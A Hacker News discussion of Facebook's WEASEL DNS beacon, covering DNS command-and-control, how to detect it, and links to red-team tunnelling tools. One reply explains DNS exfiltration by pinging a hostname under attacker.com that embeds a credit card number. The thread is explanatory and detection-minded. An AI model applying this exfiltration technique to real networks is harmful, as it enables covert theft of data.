
Weasel: A Stealthy DNS Beacon - pjf
https://github.com/facebookincubator/WEASEL
======
icefog
On my home network, using dnscrypt-proxy, I keep a whitelist of top-level
domains my devices have connected to. The few new domains to resolve are
forwarded to a remote server and logged for periodic review, to update the
whitelist or spot suspicious queries. So while it may not scale, it could be
useful for spotting DNS C2C.

~~~
JoshTriplett
Does your setup distinguish between IoT-ish devices (where you don't know what
software is running) and human-operated devices (which would trigger this
every time they browsed to a new site)?

~~~
icefog
No, but that would be fairly easy to configure - put the IoT devices on their
own VLAN with dedicated DNS server. My household is small and the list of new
domains visited is manageable and interesting to inspect by hand. It's
definitely more of a hobby than a scalable solution, I must warn.

------
mbrooks
Checkout this exploit tool I wrote for red teaming:
[https://github.com/TheRook/nsshell](https://github.com/TheRook/nsshell)

Most notably nsshell doesn't even need the target to run python. I have
written a bunch of exploit modules for it, and the only exploit modules that
require python are the jinja2 template injection modules.
([https://github.com/TheRook/nsshell/blob/master/nsshell/loade...](https://github.com/TheRook/nsshell/blob/master/nsshell/loader.py#L116))

I like your encryption protocol, I might adopt it.

~~~
moloch
I've used nsshell to great effect on multiple projects, highly recommend it
(but an encrypted option would be great rook). I've also written a more heavy
handed asymmetrically encrypted DNS C2
[https://github.com/BishopFox/sliver](https://github.com/BishopFox/sliver)

------
onesmallcoin
I used something similar to this in the past to evade traffic manipulation on
a controlled network. Iodine gives you a full tun/tap connection and
encapsulates an ipv4 connection over dns null requests and responses. I'm not
sure it is stealthy as such countless random requests to a single wildcard
domain look a little suspicious even in the high noise environment I was
testing in the blue team caught on after a few months. I ran mosh and ssh over
top to secure the connection Just enough bandwidth for an 80x30 in realtime

[https://code.kryo.se/iodine/](https://code.kryo.se/iodine/)

------
SEJeff
Not the same thing but related for those who enjoy using/abusing dns for fun
and profit:

[https://github.com/yarrick/iodine](https://github.com/yarrick/iodine)

Allows exfiltrating data using dns.

------
some_random
Ironic that this is a Facebook project

~~~
bdd
It’s from Facebook’s Red Team, which attacks Facebook and tries to move
laterally like a real, motivated, and persistent attacker. They build some
nice tooling, sometimes more advanced and well thought than what attackers
actually use to stay under the radar and accomplish their objectives. This one
is one of the many.

------
xtacy
Interesting. Wouldn't existing intrusion detection systems fire alerts on
seeing random DNS queries from a host to `domain.tld`?

~~~
3fe9a03ccd14ca5
I’ve never seen anyone try and setup alerts for random DNS queries. If you’re
in the position to know what domains are good, then why not simply use a
whitelist?

Besides, even if you saw these queries you’d have no easy way of know I’d they
were malicious or not.

~~~
LIV2
Some IDS systems do it for you I was using Darktrace at my last job and it
would tell us when servers started querying domains they don't usually query
so there are products that do it

~~~
3fe9a03ccd14ca5
Those systems usually flag based on a known set of “bad” domains, which
wouldn’t stop this attack (they could just register a few new domains before
starting the attack).

------
noodlesUK
It’s my understanding that most proper red teams and hacking groups have their
own custom payloads that generally won’t be detected by AV. Surely any open
source malware will be easily detectable...?

Additionally, I’ve never understood how packers don’t get detected by AV.
Normal software isn’t typically extremely high entropy, is it?

~~~
3fe9a03ccd14ca5
A python script seems especially easy to detect with this method, as opposed
to a binary.

~~~
danesparza
I would suspect this would get lost in the noise on a software developer's
machine. The developer's machine could be targeted by the red team because of
this (and because of a developer's normally elevated privileges and varying
network activity)

------
somegodpie
I totally misunderstand how does it work. Can anyone recommend me something to
read about it?

------
rollulus
It might be “small [and] in-memory”, but it requires a python interpreter,
right? I’m not into offensive security, but does this implementation (compared
to e.g. a statically linked binary) make sense?

~~~
zaarn
If python 3 is available on the target system, this is certainly making sense,
it might make the entire thing fly under several radars because a lot of
things scan for suspicious binaries (statically linked, coming over unusual
channels, etc.) and would leave a python file that is properly obscured alone.

------
badrabbit
Why is DNS allowed to anything other than internal resolvers when the source
is an internal host. Any network, even a home network can do this.

~~~
blincoln
The magic of DNS tunneling is that it uses the normal methods of resolving
names, so internal DNS servers/forwarders become proxy servers for the
attacker's connection out to the Internet.

The most simple example someone gave me years ago was if someone wants to
exfiltrate a credit card number, they can ping
4084515531278764-0424-789.attacker.com from an internal system. It doesn't
matter if the ping succeeds. If the internal system gets a resolution response
back from the internal DNS, the attacker has the card number in their DNS
logs.

Tunneling TCP or other C2 traffic is just an extension of that which includes
the attacker's DNS server sending a message (4 arbitrary bytes in the form of
an IPv4 address, or more data in the form of a TXT record response, etc.) back
to the internal system via the normal response path.

Its pretty clever, IMO. Most sysadmins think of DNS as being like a phonebook,
but phonebooks are a single, supposedly authoritative source, and DNS is
decentralized.

~~~
badrabbit
That really is pretty clever. Thanks a lot for explaining! Whish I could
upvote multiple times.

I didn't even consider the normal resolver path because of caching,rate limits
and perfmance but it's not like we're building a production protocol here, it
just needs to work enough to facilitiate minimao communication.

This will make an interesting threar hunting excercise.

------
RobLach
Feels like a personal “there’s bound to be a better way” project that’s a bit
polished. Fun!

